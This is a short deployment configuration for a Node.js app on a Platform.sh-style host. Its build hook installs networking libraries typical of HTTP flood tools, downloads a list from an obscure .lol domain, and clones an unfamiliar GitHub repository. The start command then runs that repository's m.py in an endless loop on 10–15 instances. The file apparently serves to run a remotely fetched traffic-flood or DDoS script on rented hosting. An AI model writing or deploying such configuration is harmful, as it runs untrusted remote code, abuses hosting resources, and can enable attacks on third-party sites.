applications:
  myapp:
    type: 'nodejs:24'

    build:
      flavor: none

    hooks:
      build: |
        apt-get update
        apt-get install -y python3 python3-pip python3-dev build-essential libssl-dev git curl

        pip3 install --upgrade pip
        pip3 install aioquic uvloop requests

        npm install net chalk hpack.js hpack colors puppeteer-real-browser cluster

        curl -s "https://xn--mnqu23e2hf.lol/api.php?key=user1208&country=all" > k.txt

        git clone https://github.com/vrbrh921-glitch/Fc.git
        

    web:
      instances:
        min: 10
        max: 15
      commands:
        start: |
          cd Fc
          exec bash -c 'while true; do python3 m.py; sleep 2; done'

      locations:
        "/":
          passthru: true
          allow: true
